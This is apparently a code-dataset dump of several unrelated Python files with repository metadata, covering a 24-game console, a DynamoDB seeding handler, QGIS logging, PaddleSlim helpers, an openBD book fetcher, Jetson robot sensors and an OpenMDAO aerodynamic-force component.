expr in answers]) else: s = MSG_PLAY_NO_ANSWER self.print_title(s) def main(self): '''the main entry of the game console''' choices = '1p2c3q' while True: r = self.ui_menu(MSG_MENU_MAIN, choices) if r in '1p': self.play() elif r in '2c': self.ui_check_answer() elif r in ('3q' + INPUT_EOF): return def print_result(self): solved = 0 failed = 0 hinted = 0 for hand in self.hands: if hand.result == game.HAND_RESULT_SOLVED: solved += 1 elif hand.result == game.HAND_RESULT_HINTED: hinted += 1 elif hand.result == game.HAND_RESULT_FAILED: failed += 1 print() print('Total %d hands solved' % solved) print('Total %d hands solved with 
hint' % hinted) print('Total %d hands failed to solve' % failed) print() def ui_menu_and_expr(self, menu, choices, eof=True): hand_ints = self.hands[-1].integers self.print_title(menu, dechar='-') while True: r = self.raw_input_ex(MSG_PLAY_INPUT_EXPR).strip() if r == '' or (r in choices and len(r) > 1): print(MSG_INVALID_INPUT) continue elif r in choices or (eof and r == INPUT_EOF): print() return r try: expr = calc.parse(r) except ValueError as e: print(str(e)) continue integers = expr.get_integers() for i in integers: if i not in hand_ints: print(MSG_INVALID_INTEGER % i) break else: return expr def play(self): while True: if not self.hands: self.print_title(MSG_PLAY_NEW_SET % self.seti, dechar='*') hand = self.new_hand() if not hand: # no enough cards for a new hand self.print_title(MSG_PLAY_NO_CARDS, dechar='*') self.print_result() choices = '1n2b3q' r = self.ui_menu(MSG_MENU_SET_END, choices) if r in '1n': # renew the set self.reset() continue elif r in ('2b' + INPUT_EOF): # back to the main menu return elif r in '3q': sys.exit(0) print() if self.showcard: sc = hand.str_cards() else: sc = ' '.join([str(i) for i in hand.integers]) self.print_title(MSG_PLAY_NEW_HAND % (len(self.hands), sc), dechar='+') print() while True: choices = '1n2h3s4b5q' r = self.ui_menu_and_expr(MSG_MENU_PLAY, choices) if isinstance(r, calc.Expr): expr = r check_r = str(r) if expr.value == self.target: hand.solved() if not self.calculating_the_number_of_numbers(check_r, sc): print(MSG_INVALID_INPUT) continue s = MSG_PLAY_RIGHT self.print_title(s) choices = '1t2n3s4q' r = self.ui_menu(MSG_MENU_PLAY_RIGHT, choices, eof=False) if r in '1t': continue elif r in '2n': break elif r in '3s': self.print_title(hand.str_answer()) elif r in '4q': sys.exit(0) else: self.print_title(MSG_PLAY_WRONG) continue elif r in '1n': # no answer if hand.answers: self.print_title(MSG_PLAY_WRONG) continue else: hand.solved() self.print_title(MSG_PLAY_RIGHT) elif r in '2h': # show a hint if hand.answers: hand.hinted() self.print_title(hand.str_hint()) continue else: self.print_title(MSG_PLAY_NO_ANSWER) elif r in '3s': # show the answer if hand.answers: s = hand.str_answer() else: s = MSG_PLAY_NO_ANSWER self.print_title(s) elif r in ('4b' + INPUT_EOF): # back to the main menu return elif r in '5q': sys.exit(0) # this hand is end break def calculating_the_number_of_numbers(self, r, sc): """calculates how many numbers are in the user input""" numb = '' check_list = [] choices = '1234567890' r = r.split() sc = sc.split() for i in r: if i in '+-*×/÷': r.remove(i) if len(r) != len(sc): return False return True def arg_parse(): parser = argparse.ArgumentParser(description='Play the 24 Game') parser.add_argument('-c', type=int, default=4, dest='count', help='the number of integers to play with, default=4') parser.add_argument('-C', action='store_true', dest='showcard', help='show cards instead of integers under interactive mode') parser.add_argument('-d', action='store_true', dest='debug', help='enable debug output') parser.add_argument('-i', action='store_true', dest='interactive', help='interactive mode, all positional integers arguments omitted') parser.add_argument('-N', action='store_true', dest='face2ten', help='under interactive mode, set J Q K to 10, default=11,12,13') parser.add_argument('-t', type=int, default=24, dest='target', help='the game target, default=24') parser.add_argument('integers', nargs='*') r = parser.parse_args() if not r.interactive and len(r.integers) == 0: r.interactive = True return r def main(): args = arg_parse() 
try: if args.interactive: gc = GameConsole(args.target, args.count, args.face2ten, args.showcard) gc.main() sys.exit(0) except KeyboardInterrupt: sys.exit(1) except Exception as e: if args.debug: traceback.print_exc() else: print(str(e), file=sys.stderr) sys.exit(3) if __name__ == '__main__': main()

filtered:remove_function_no_docstring: 6,449   filtered:remove_class_no_docstring: 2,524   filtered:remove_delete_markers: 69

hexsha: ce74a3c506ce96d7da83678be3ac5f3605bd112f
size: 839   ext: py   lang: Python
max_stars_repo:  path=dynamodb-serverless/functions/put/handler.py, name=koki-nakamura22/serverless-framework-practice, head_hexsha=b6fb96cc97ecb7a1fa167c7cccb143510466d350, licenses=[ "MIT" ], stars_count=null, stars_event_min=null, stars_event_max=null
max_issues_repo: path=dynamodb-serverless/functions/put/handler.py, name=koki-nakamura22/serverless-framework-practice, head_hexsha=b6fb96cc97ecb7a1fa167c7cccb143510466d350, licenses=[ "MIT" ], issues_count=null, issues_event_min=null, issues_event_max=null
max_forks_repo:  path=dynamodb-serverless/functions/put/handler.py, name=koki-nakamura22/serverless-framework-practice, head_hexsha=b6fb96cc97ecb7a1fa167c7cccb143510466d350, licenses=[ "MIT" ], forks_count=null, forks_event_min=null, forks_event_max=null
content:
import json
import os

import boto3
from faker import Faker

# DynamoDB object
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table(f"TestUsersTable-{os.environ['STAGE']}")

avg_line_length: 20.463415   max_line_length: 95   alphanum_fraction: 0.588796
original_content:
import json
import os

import boto3
from faker import Faker

# DynamoDB object
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table(f"TestUsersTable-{os.environ['STAGE']}")

def __truncate():
    response = table.scan()
    key_names = [ x["AttributeName"] for x in table.key_schema ]
    delete_keys = [ { k:v for k,v in x.items() if k in key_names } for x in response["Items"] ]
    with table.batch_writer() as batch:
        for key in delete_keys:
            batch.delete_item(Key = key)

def __put(id, name):
    table.put_item(
        Item = {
            "id" : id,
            "name" : name,
        }
    )

def put(event, context):
    __truncate()

    fake = Faker()
    for n in range(1, 10 + 1):
        __put(str(n).zfill(3), fake.name())

    response = {
        "statusCode": 200,
    }
    return response

filtered:remove_function_no_docstring: 586   filtered:remove_class_no_docstring: 0   filtered:remove_delete_markers: 69

hexsha: 8411765f0f08514141bd4c621bce5644bb0156cd
size: 398   ext: py   lang: Python
max_stars_repo:  path=Chapter07/4985_07_01-logs.py, name=mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition, head_hexsha=1b2fefdb09f614a2005976a451f882a198c6c9c5, licenses=[ "MIT" ], stars_count=43, stars_event_min=2017-03-27T18:58:26.000Z, stars_event_max=2022-03-25T15:29:45.000Z
max_issues_repo: path=Chapter07/4985_07_01-logs.py, name=mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition, head_hexsha=1b2fefdb09f614a2005976a451f882a198c6c9c5, licenses=[ "MIT" ], issues_count=2, issues_event_min=2018-07-02T09:23:47.000Z, issues_event_max=2018-08-23T13:57:41.000Z
max_forks_repo:  path=Chapter07/4985_07_01-logs.py, name=mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition, head_hexsha=1b2fefdb09f614a2005976a451f882a198c6c9c5, licenses=[ "MIT" ], forks_count=31, forks_event_min=2017-03-08T06:37:22.000Z, forks_event_max=2021-12-17T21:51:30.000Z
content:
# Using Log Files
# Settings/Options/System/Environment (use custom variables)
# QGIS_LOG_FILE=/qgis_data/log.txt
# Restart QGIS

# Message to log file:
QgsLogger.logMessageToFile("This is a message to a log file.")

# Message to QGIS Log Window ( yellow triangle icon in the lower right)
QgsMessageLog.logMessage("This is a message from the Python Console", "Python Console", QgsMessageLog.INFO)

avg_line_length: 36.181818   max_line_length: 107   alphanum_fraction: 0.776382
original_content:
# Using Log Files
# Settings/Options/System/Environment (use custom variables)
# QGIS_LOG_FILE=/qgis_data/log.txt
# Restart QGIS

# Message to log file:
QgsLogger.logMessageToFile("This is a message to a log file.")

# Message to QGIS Log Window ( yellow triangle icon in the lower right)
QgsMessageLog.logMessage("This is a message from the Python Console", "Python Console", QgsMessageLog.INFO)

filtered:remove_function_no_docstring: 0   filtered:remove_class_no_docstring: 0   filtered:remove_delete_markers: 0

hexsha: fad016a754f61df9c72c04956901d978db0b6df6
size: 1,500   ext: py   lang: Python
max_stars_repo:  path=paddleslim/nas/ofa/utils/utils.py, name=zhuguiqian/PaddleSlim, head_hexsha=c363c91c36bb9ada41f755c0ec4df3282ccdd6f0, licenses=[ "Apache-2.0" ], stars_count=null, stars_event_min=null, stars_event_max=null
max_issues_repo: path=paddleslim/nas/ofa/utils/utils.py, name=zhuguiqian/PaddleSlim, head_hexsha=c363c91c36bb9ada41f755c0ec4df3282ccdd6f0, licenses=[ "Apache-2.0" ], issues_count=null, issues_event_min=null, issues_event_max=null
max_forks_repo:  path=paddleslim/nas/ofa/utils/utils.py, name=zhuguiqian/PaddleSlim, head_hexsha=c363c91c36bb9ada41f755c0ec4df3282ccdd6f0, licenses=[ "Apache-2.0" ], forks_count=null, forks_event_min=null, forks_event_max=null
content:
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

avg_line_length: 31.914894   max_line_length: 74   alphanum_fraction: 0.692667
original_content:
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

def compute_start_end(kernel_size, sub_kernel_size):
    center = kernel_size // 2
    sub_center = sub_kernel_size // 2
    start = center - sub_center
    end = center + sub_center + 1
    assert end - start == sub_kernel_size
    return start, end


def get_same_padding(kernel_size):
    assert isinstance(kernel_size, int)
    assert kernel_size % 2 > 0, "kernel size must be odd number"
    return kernel_size // 2


def convert_to_list(value, n):
    return [value, ] * n


def search_idx(num, sorted_nestlist):
    max_num = -1
    max_idx = -1
    for idx in range(len(sorted_nestlist)):
        task_ = sorted_nestlist[idx]
        max_num = task_[-1]
        max_idx = len(task_) - 1
        for phase_idx in range(len(task_)):
            if num <= task_[phase_idx]:
                return idx, phase_idx
    assert num > max_num
    return len(sorted_nestlist) - 1, max_idx

filtered:remove_function_no_docstring: 793   filtered:remove_class_no_docstring: 0   filtered:remove_delete_markers: 92

hexsha: 9e42668859a3e942dd8cf341d42cb36a048ac54f
size: 3,715   ext: py   lang: Python
max_stars_repo:  path=backend/openbd.py, name=n-yU/shisho, head_hexsha=dc99a2d90dde3599af62a6a59a4aabf6b5a72011, licenses=[ "MIT" ], stars_count=1, stars_event_min=2021-08-20T05:34:31.000Z, stars_event_max=2021-08-20T05:34:31.000Z
max_issues_repo: path=backend/openbd.py, name=n-yU/shisho, head_hexsha=dc99a2d90dde3599af62a6a59a4aabf6b5a72011, licenses=[ "MIT" ], issues_count=null, issues_event_min=null, issues_event_max=null
max_forks_repo:  path=backend/openbd.py, name=n-yU/shisho, head_hexsha=dc99a2d90dde3599af62a6a59a4aabf6b5a72011, licenses=[ "MIT" ], forks_count=null, forks_event_min=null, forks_event_max=null
content:
from logging import getLogger, StreamHandler, DEBUG, Formatter
from typing import Dict, Union
import re
import json

import requests
import MeCab
from neologdn import normalize

# ロガー設定
logger = getLogger(__name__)
handler = StreamHandler()
handler.setLevel(DEBUG)
logger.setLevel(DEBUG)
logger.addHandler(handler)
logger.propagate = False
handler.setFormatter(Formatter('[openBD] %(asctime)s - %(message)s'))

avg_line_length: 35.04717   max_line_length: 155   alphanum_fraction: 0.602692
original_content:
from logging import getLogger, StreamHandler, DEBUG, Formatter from typing import Dict, Union import re import json import requests import MeCab from neologdn import normalize # ロガー設定 logger = getLogger(__name__) handler = StreamHandler() handler.setLevel(DEBUG) logger.setLevel(DEBUG) logger.addHandler(handler) logger.propagate = False handler.setFormatter(Formatter('[openBD] %(asctime)s - %(message)s')) class OpenBD: # openBD: https://openbd.jp/ def __init__(self, isbn10: int, mecab: MeCab.Tagger): """"インスタンス生成時の初期化処理 Args: isbn10 (int): OpenBDへリクエストする書籍のISBN-10 mecab (MeCab.Tagger): MeCab設定(辞書等) """ self.isbn10 = isbn10 # 書籍のISBN-10 self.result = self.get_json_from_openbd() # openBDへのリクエスト結果 self.mecab = mecab # MeCab設定 def get_json_from_openbd(self) -> str: """openBDから書籍情報取得 Returns: str: openBDリクエスト結果 """ # 指定ISBN-10の書籍情報を取得する, openBDエンドポイント openbd_endpoint = 'https://api.openbd.jp/v1/get?isbn={0}'.format(self.isbn10) try: response = requests.get(openbd_endpoint) response.raise_for_status() except requests.RequestException as e: # ステータスコード200番台以外 -> エラーログ出力 logger.debug(e) return 'FAILED' openbd = json.loads(response.text)[0] # 書籍情報 from openBD # openBDで書籍情報が見つからないケース if openbd is None: return 'NOT FOUND' self.openbd = openbd return 'OK' def get_std_info(self) -> Union[Dict[str, str], bool]: if self.result != 'OK': logger.debug('openBDからの書籍情報取得に失敗しているため基本情報を取得できません') return False # 基本情報取得 title = self.openbd['summary']['title'] # タイトル publisher = self.openbd['summary']['publisher'] # 出版社 authors = self.openbd['summary']['author'] # 著者 cover = self.openbd['summary']['cover'] # 表紙画像URL # ISBN-10ベース情報 isbn10 = self.isbn10 amazon = 'https://www.amazon.co.jp/dp/{0}'.format(isbn10) # 出版日: 形式が異なるため一時変数に代入後処理 tmp_pubdate = self.openbd['summary']['pubdate'] if len(tmp_pubdate) == 8: # pubdate: yyyyMMdd pubdate = '{0}-{1}-{2}'.format(tmp_pubdate[:4], tmp_pubdate[4:6], tmp_pubdate[6:]) else: # pubdare: yyyy-MM pubdate = '{0}-01'.format(tmp_pubdate) # 書籍詳細(目次や概要など)の取得 if self.openbd['onix']['CollateralDetail'].get('TextContent'): # 複数ある場合は連結 detail = ' '.join([text_content['Text'].replace('\n', ' ') for text_content in self.openbd['onix']['CollateralDetail']['TextContent']]) else: # 詳細が存在しない場合 -> 未登録とする detail = '未登録' # 書籍説明(タイトル,出版社,著者,詳細を連結した文章)テキスト(処理前) # neologdnによる正規化 -> 数字削除(目次対策) tmp_description = re.sub(r'[0-9]+', ' ', normalize('{0} {1} {2} {3}'.format(title, publisher, authors, detail))) # 書籍説明テキストの分かち書きと品詞フィルタリング description_word_list = [] # 書籍説明テキスト対象単語 for line in self.mecab.parse(tmp_description).splitlines(): chunks = line.split('\t') if len(chunks) > 3 and (chunks[3].startswith('動詞') or chunks[3].startswith('形容詞') or chunks[3].startswith('名詞')): # 動詞or形容詞or名詞 -> 訓練対象 description_word_list.append(chunks[0]) # 書籍説明テキスト(処理後): Doc2Vec訓練時に書籍を表す文章として使用 description = ' '.join(description_word_list) info = dict(amazon=amazon, isbn10=isbn10, cover=cover, title=title, publisher=publisher, authors=authors, pubdate=pubdate, description=description) return info

filtered:remove_function_no_docstring: 2,650   filtered:remove_class_no_docstring: 1,378   filtered:remove_delete_markers: 23

hexsha: f7fe38c9a4b8c5796670a8aa33b5cb1b8bbd7c39
size: 5,246   ext: py   lang: Python
max_stars_repo:  path=src/jetson/Sensors/sensors_simple.py, name=ichalkiad/VW_challenge, head_hexsha=333222010ecf3d1ca4a0e181239f761c975453e9, licenses=[ "Apache-2.0" ], stars_count=1, stars_event_min=2017-08-16T08:42:49.000Z, stars_event_max=2017-08-16T08:42:49.000Z
max_issues_repo: path=src/jetson/Sensors/sensors_simple.py, name=ichalkiad/VW_challenge, head_hexsha=333222010ecf3d1ca4a0e181239f761c975453e9, licenses=[ "Apache-2.0" ], issues_count=4, issues_event_min=2017-08-09T23:01:30.000Z, issues_event_max=2017-08-24T16:44:13.000Z
max_forks_repo:  path=src/jetson/Sensors/sensors_simple.py, name=yhalk/vw_challenge_ECR, head_hexsha=c1ff50070d0f7367ccfbf473c69e90fd2be5e85e, licenses=[ "Apache-2.0" ], forks_count=null, forks_event_min=null, forks_event_max=null
content:
import paho.mqtt.client as mqtt
import ev3dev.ev3 as ev3
import ctypes
import numpy as np
import sys
import cv2
from Sensors.mpu6050.mpu6050 import MPU6050
import smbus
from Sensors.odometry import Odometry
import sys, serial
from serial.tools import list_ports

#Create camera sensor object
camera = OnBoardCamera()

avg_line_length: 43   max_line_length: 280   alphanum_fraction: 0.609989
original_content:
import paho.mqtt.client as mqtt import ev3dev.ev3 as ev3 import ctypes import numpy as np import sys import cv2 from Sensors.mpu6050.mpu6050 import MPU6050 import smbus from Sensors.odometry import Odometry import sys, serial from serial.tools import list_ports class Sensor(object): def __init__(self, *args, **kwargs): pass def read(self): raise ValueError('This function must be implemented by ') class IR_teensy(Sensor): def __init__(self): self.ports = list(list_ports.comports()) # get all the connected serial devices self.serial_port = serial.Serial('/dev/'+self.ports[0].name) # connect to the first def debug(self): ''' Use if cannot connect to the port This function will print all found serial devices and prints the name and index of the port ''' for i, item in enumerate(self.ports): print(i + ' : ' + item.name) def read(self): ''' Reads the current value from the teensy Returns: Distance in cm ''' measurement = self.serial_port.readline() # read the measurement measurement = measurement.decode('utf-8').split('\r') # change it to utf and split it on funny characters return measurement[0] # only return the actual measurment class IMU2(Sensor): def __init__(self, bus='/dev/i2c-1', address=0x68): self.bus = smbus.SMBus(1) self.address = address self.mpu = MPU6050(self.bus,self.address, 'IMU') def read(self): ''' Reads the current values from the IMU using the mpu library Returns: tuple containing: pitch, roll, gyro x,y,z, accel x,y,z these values are scaled and NOT raw ''' return self.mpu.read_all() class IMU(Sensor): def __init__(self, path_to_shared_lib_mpu='/home/nvidia/jetson-robot/IOInterface/jetson/Sensors/mpu/libmpu.so', bus_filename='/dev/i2c-1', bus_adresses=[0x68, 0x69]): bus_filename = bus_filename.encode('ascii') self.libmpu = ctypes.cdll.LoadLibrary(path_to_shared_lib_mpu) self.file_descriptors = [self.libmpu.initIMU(bus_filename, bus_adress) for bus_adress in bus_adresses] self.data_c_arrays = [(ctypes.c_int16*7)() for _ in range(len(bus_adresses))] self.name = 'imu' self.data_sources = ["temperature", "acceleration", "gyro"] def read(self): data_dict = {} for idx, (file_descriptor, data_c_array) in enumerate(zip(self.file_descriptors, self.data_c_arrays)): self.libmpu.readIMU(file_descriptor, data_c_array) data_np_array = np.array(data_c_array) data_dict['temperature_{}'.format(idx)] = data_np_array[0] / 340.0 + 36.53 data_dict['acceleration_{}'.format(idx)] = np.array([int(data_np_array[1]), int(data_np_array[2]), int(data_np_array[3]), ]) data_dict['gyro_{}'.format(idx)] = np.array([int(data_np_array[4]), int(data_np_array[5]), int(data_np_array[6]), ]) return data_dict def read_sensor_nr(self, sensor_nr): # TODO: Ask Max, if the magic values for temperature conversion are correct. data_dict = {} self.libmpu.readIMU(self.file_descriptors[sensor_nr], self.data_c_arrays[sensor_nr]) data_np_array = np.array(self.data_c_arrays[sensor_nr]) data_dict['temperature'] = data_np_array[0] / 340.0 + 36.53 data_dict['acceleration'] = np.array([int(data_np_array[1]), int(data_np_array[2]), int(data_np_array[3])]) data_dict['gyro'] = np.array([int(data_np_array[4]), int(data_np_array[5]), int(data_np_array[6])]) return data_dict def get_data_sources(self): return self.data_sources class OnBoardCamera(Sensor): def __init__(self): self.name = 'onBoardCamera' self.cap = cv2.VideoCapture("nvcamerasrc ! video/x-raw(memory:NVMM), width=(int)160, height=(int)120, format=(string)I420, framerate=(fraction)30/1 ! nvvidconv flip-method=2 ! video/x-raw, format=(string)I420 ! videoconvert ! 
video/x-raw, format=(string)BGR ! appsink") #self.cap = cv2.VideoCapture("nvcamerasrc ! video/x-raw(memory:NVMM), width=(int)(160), height=(int)(120),format=(string)I420, framerate=(fraction)2/1 ! nvvidconv flip-method=0 ! video/x-raw, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink") def read(self): if self.cap.isOpened(): ret_val, frame = self.cap.read(); frame = cv2.flip(frame,0) frame = cv2.flip(frame,1) else: raise ValueError('Camera not opened. Sorry this message is not really helpful, blame openCV :-) ') return {'onBoardCamera':frame} def clean_buf(self): for i in range(5): self.cap.grab() #Create camera sensor object camera = OnBoardCamera()

filtered:remove_function_no_docstring: 3,558   filtered:remove_class_no_docstring: 1,012   filtered:remove_delete_markers: 355

hexsha: 790f64346cac505157953135acdaf67a66ffe6fe
size: 23,905   ext: py   lang: Python
max_stars_repo:  path=mphys/integrated_forces.py, name=timryanb/mphys, head_hexsha=74560a163034a0006a17811ba1206bab00f1f775, licenses=[ "Apache-2.0" ], stars_count=8, stars_event_min=2022-02-22T18:08:56.000Z, stars_event_max=2022-03-14T13:32:46.000Z
max_issues_repo: path=mphys/integrated_forces.py, name=timryanb/mphys, head_hexsha=74560a163034a0006a17811ba1206bab00f1f775, licenses=[ "Apache-2.0" ], issues_count=15, issues_event_min=2022-02-22T15:10:15.000Z, issues_event_max=2022-03-23T16:15:09.000Z
max_forks_repo:  path=mphys/integrated_forces.py, name=timryanb/mphys, head_hexsha=74560a163034a0006a17811ba1206bab00f1f775, licenses=[ "Apache-2.0" ], forks_count=8, forks_event_min=2022-02-22T18:08:35.000Z, forks_event_max=2022-03-17T16:21:08.000Z
content:
import numpy as np
import openmdao.api as om

if __name__ == '__main__':
    check_integrated_surface_force_partials()

avg_line_length: 53.004435   max_line_length: 110   alphanum_fraction: 0.474001
original_content:
import numpy as np import openmdao.api as om class IntegratedSurfaceForces(om.ExplicitComponent): def setup(self): self.add_input('aoa',desc = 'angle of attack', units='rad',tags=['mphys_input']) self.add_input('yaw',desc = 'yaw angle',units='rad',tags=['mphys_input']) self.add_input('ref_area', val = 1.0,tags=['mphys_input']) self.add_input('moment_center',shape=3,tags=['mphys_input']) self.add_input('ref_length', val = 1.0,tags=['mphys_input']) self.add_input('q_inf', val = 1.0,tags=['mphys_input']) self.add_input('x_aero', shape_by_conn=True, distributed=True, desc = 'surface coordinates', tags=['mphys_coupling']) self.add_input('f_aero', shape_by_conn=True, distributed=True, desc = 'dimensional forces at nodes', tags=['mphys_coupling']) self.add_output('C_L', desc = 'Lift coefficient', tags=['mphys_result']) self.add_output('C_D', desc = 'Drag coefficient', tags=['mphys_result']) self.add_output('C_X', desc = 'X Force coefficient', tags=['mphys_result']) self.add_output('C_Y', desc = 'Y Force coefficient', tags=['mphys_result']) self.add_output('C_Z', desc = 'Z Force coefficient', tags=['mphys_result']) self.add_output('CM_X', desc = 'X Moment coefficient', tags=['mphys_result']) self.add_output('CM_Y', desc = 'Y Moment coefficient', tags=['mphys_result']) self.add_output('CM_Z', desc = 'Z Moment coefficient', tags=['mphys_result']) self.add_output('Lift', desc = 'Total Lift', tags=['mphys_result']) self.add_output('Drag', desc = 'Total Drag', tags=['mphys_result']) self.add_output('F_X', desc = 'Total X Force', tags=['mphys_result']) self.add_output('F_Y', desc = 'Total Y Force', tags=['mphys_result']) self.add_output('F_Z', desc = 'Total Z Force', tags=['mphys_result']) self.add_output('M_X', desc = 'Total X Moment', tags=['mphys_result']) self.add_output('M_Y', desc = 'Total Y Moment', tags=['mphys_result']) self.add_output('M_Z', desc = 'Total Z Moment', tags=['mphys_result']) def compute(self,inputs,outputs): aoa = inputs['aoa'] yaw = inputs['yaw'] area = inputs['ref_area'] q_inf = inputs['q_inf'] xc = inputs['moment_center'][0] yc = inputs['moment_center'][1] zc = inputs['moment_center'][2] c = inputs['ref_length'] x = inputs['x_aero'][0::3] y = inputs['x_aero'][1::3] z = inputs['x_aero'][2::3] fx = inputs['f_aero'][0::3] fy = inputs['f_aero'][1::3] fz = inputs['f_aero'][2::3] fx_total = self.comm.allreduce(np.sum(fx)) fy_total = self.comm.allreduce(np.sum(fy)) fz_total = self.comm.allreduce(np.sum(fz)) outputs['F_X'] = fx_total outputs['F_Y'] = fy_total outputs['F_Z'] = fz_total outputs['C_X'] = fx_total / (q_inf * area) outputs['C_Y'] = fy_total / (q_inf * area) outputs['C_Z'] = fz_total / (q_inf * area) outputs['Lift'] = -fx_total * np.sin(aoa) + fz_total * np.cos(aoa) outputs['Drag'] = ( fx_total * np.cos(aoa) * np.cos(yaw) - fy_total * np.sin(yaw) + fz_total * np.sin(aoa) * np.cos(yaw) ) outputs['C_L'] = outputs['Lift'] / (q_inf * area) outputs['C_D'] = outputs['Drag'] / (q_inf * area) m_x = self.comm.allreduce( np.dot(fz,(y-yc)) - np.dot(fy,(z-zc))) m_y = self.comm.allreduce(-np.dot(fz,(x-xc)) + np.dot(fx,(z-zc))) m_z = self.comm.allreduce( np.dot(fy,(x-xc)) - np.dot(fx,(y-yc))) outputs['M_X'] = m_x outputs['M_Y'] = m_y outputs['M_Z'] = m_z outputs['CM_X'] = m_x / (q_inf * area * c) outputs['CM_Y'] = m_y / (q_inf * area * c) outputs['CM_Z'] = m_z / (q_inf * area * c) def compute_jacvec_product(self, inputs, d_inputs, d_outputs, mode): aoa = inputs['aoa'] yaw = inputs['yaw'] area = inputs['ref_area'] q_inf = inputs['q_inf'] xc = inputs['moment_center'][0] yc = 
inputs['moment_center'][1] zc = inputs['moment_center'][2] c = inputs['ref_length'] x = inputs['x_aero'][0::3] y = inputs['x_aero'][1::3] z = inputs['x_aero'][2::3] fx = inputs['f_aero'][0::3] fy = inputs['f_aero'][1::3] fz = inputs['f_aero'][2::3] fx_total = self.comm.allreduce(np.sum(fx)) fy_total = self.comm.allreduce(np.sum(fy)) fz_total = self.comm.allreduce(np.sum(fz)) lift = -fx_total * np.sin(aoa) + fz_total * np.cos(aoa) drag = ( fx_total * np.cos(aoa) * np.cos(yaw) - fy_total * np.sin(yaw) + fz_total * np.sin(aoa) * np.cos(yaw) ) m_x = self.comm.allreduce( np.dot(fz,(y-yc)) - np.dot(fy,(z-zc))) m_y = self.comm.allreduce(-np.dot(fz,(x-xc)) + np.dot(fx,(z-zc))) m_z = self.comm.allreduce( np.dot(fy,(x-xc)) - np.dot(fx,(y-yc))) if mode == 'fwd': if 'aoa' in d_inputs: daoa_rad = d_inputs['aoa'] if 'Lift' in d_outputs or 'C_L' in d_outputs: d_lift_d_aoa = ( - fx_total * np.cos(aoa) * daoa_rad - fz_total * np.sin(aoa) * daoa_rad ) if 'Lift' in d_outputs: d_outputs['Lift'] += d_lift_d_aoa if 'C_L' in d_outputs: d_outputs['C_L'] += d_lift_d_aoa / (q_inf * area) if 'Drag' in d_outputs or 'C_D' in d_outputs: d_drag_d_aoa = ( fx_total * (-np.sin(aoa) * daoa_rad) * np.cos(yaw) + fz_total * ( np.cos(aoa) * daoa_rad) * np.cos(yaw)) if 'Drag' in d_outputs: d_outputs['Drag'] += d_drag_d_aoa if 'C_D' in d_outputs: d_outputs['C_D'] += d_drag_d_aoa / (q_inf * area) if 'yaw' in d_inputs: dyaw_rad = d_inputs['yaw'] if 'Drag' in d_outputs or 'C_D' in d_outputs: d_drag_d_yaw = ( fx_total * np.cos(aoa) * (-np.sin(yaw) * dyaw_rad) - fy_total * np.cos(yaw) * dyaw_rad + fz_total * np.sin(aoa) * (-np.sin(yaw) * dyaw_rad) ) if 'Drag' in d_outputs: d_outputs['Drag'] += d_drag_d_yaw if 'C_D' in d_outputs: d_outputs['C_D'] += d_drag_d_yaw / (q_inf * area) if 'ref_area' in d_inputs: d_nondim = - d_inputs['ref_area'] / (q_inf * area**2.0) if 'C_X' in d_outputs: d_outputs['C_X'] += fx_total * d_nondim if 'C_Y' in d_outputs: d_outputs['C_Y'] += fy_total * d_nondim if 'C_Z' in d_outputs: d_outputs['C_Z'] += fz_total * d_nondim if 'C_L' in d_outputs: d_outputs['C_L'] += lift * d_nondim if 'C_D' in d_outputs: d_outputs['C_D'] += drag * d_nondim if 'CM_X' in d_outputs: d_outputs['CM_X'] += m_x * d_nondim / c if 'CM_X' in d_outputs: d_outputs['CM_Y'] += m_y * d_nondim / c if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += m_z * d_nondim / c if 'moment_center' in d_inputs: dxc = d_inputs['moment_center'][0] dyc = d_inputs['moment_center'][1] dzc = d_inputs['moment_center'][2] if 'M_X' in d_outputs: d_outputs['M_X'] += -fz_total * dyc + fy_total * dzc if 'M_Y' in d_outputs: d_outputs['M_Y'] += fz_total * dxc - fx_total * dzc if 'M_Z' in d_outputs: d_outputs['M_Z'] += -fy_total * dxc + fx_total * dyc if 'CM_X' in d_outputs: d_outputs['CM_X'] += (-fz_total * dyc + fy_total * dzc) / (q_inf * area * c) if 'CM_Y' in d_outputs: d_outputs['CM_Y'] += ( fz_total * dxc - fx_total * dzc) / (q_inf * area * c) if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += (-fy_total * dxc + fx_total * dyc) / (q_inf * area * c) if 'ref_length' in d_inputs: d_nondim = - d_inputs['ref_length'] / (q_inf * area * c**2.0) if 'CM_X' in d_outputs: d_outputs['CM_X'] += m_x * d_nondim if 'CM_X' in d_outputs: d_outputs['CM_Y'] += m_y * d_nondim if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += m_z * d_nondim if 'q_inf' in d_inputs: d_nondim = - d_inputs['q_inf'] / (q_inf**2.0 * area) if 'C_X' in d_outputs: d_outputs['C_X'] += fx_total * d_nondim if 'C_Y' in d_outputs: d_outputs['C_Y'] += fy_total * d_nondim if 'C_Z' in d_outputs: d_outputs['C_Z'] += fz_total * d_nondim if 
